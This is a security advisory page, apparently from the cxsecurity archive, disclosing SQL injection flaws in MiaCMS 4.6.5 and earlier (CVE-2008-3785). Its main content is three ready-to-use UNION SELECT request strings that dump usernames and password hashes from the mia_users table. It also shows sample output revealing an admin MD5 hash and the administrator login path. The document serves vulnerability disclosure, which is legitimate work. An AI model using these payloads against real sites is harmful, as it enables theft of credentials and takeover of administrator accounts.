Bug: MiaCMS <= 4.6.5 Multiple Remote SQL Injection Vulnerabilities (WLB-2008080181 Ascii Version)

English Version
WLB2

CVE WLB2

 Topic: MiaCMS <= 4.6.5 Multiple Remote SQL Injection Vulnerabilities
 Credit: Dok_tOR
 Date: 2008.08.27
 CWE: CWE-89 (Show similar)
 CVE: CVE-2008-3785 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Risk
Local
Remote
High
No
Yes

MiaCMS <= 4.6.5 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz
Home Page: www.antichat.ru
Date found: 24.08.08
Product: MiaCMS
Version: 4.6.5
Download script: http://miacms.googlecode.com/files/MiaCMS_v4.6.5.tar.gz
Vulnerability Class: SQL Injection


Exploit 1:

index.php?option=com_content&task=view&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+mia_use
rs/*&Itemid=9

Exploit 2:

index.php?option=com_content&task=category&sectionid=doktor&id=-9999999+union+select+1,concat_ws(0x3a,userna
me,password)+from+mia_users/*&Itemid=27

Exploit 3:

index.php?option=com_content&task=blogsection&id=-9999999+union+select+1,concat_ws(0x3a,username,password)+from+
mia_users/*&Itemid=9


Opera -> Source(Ctrl+F3)

<div class="moduletable">

...

onclick="window.open('http://digg.com/submit?phase=3&amp;url='+encodeURIComponent(location.href)+'&amp;body
text=This+site+uses+MiaCMS+-+the+free%2C+open+source+content+management+system+admin%3A21232f297a57a5a743894a0e4a801fc3&
amp;amp;

admin:21232f297a57a5a743894a0e4a801fc3

http://localhost/[installdir]/administrator/

References:

http://www.securityfocus.com/bid/30805
http://www.milw0rm.com/exploits/6295

[ ASCII VERSION ]

Copyright 2012, cxsecurity.com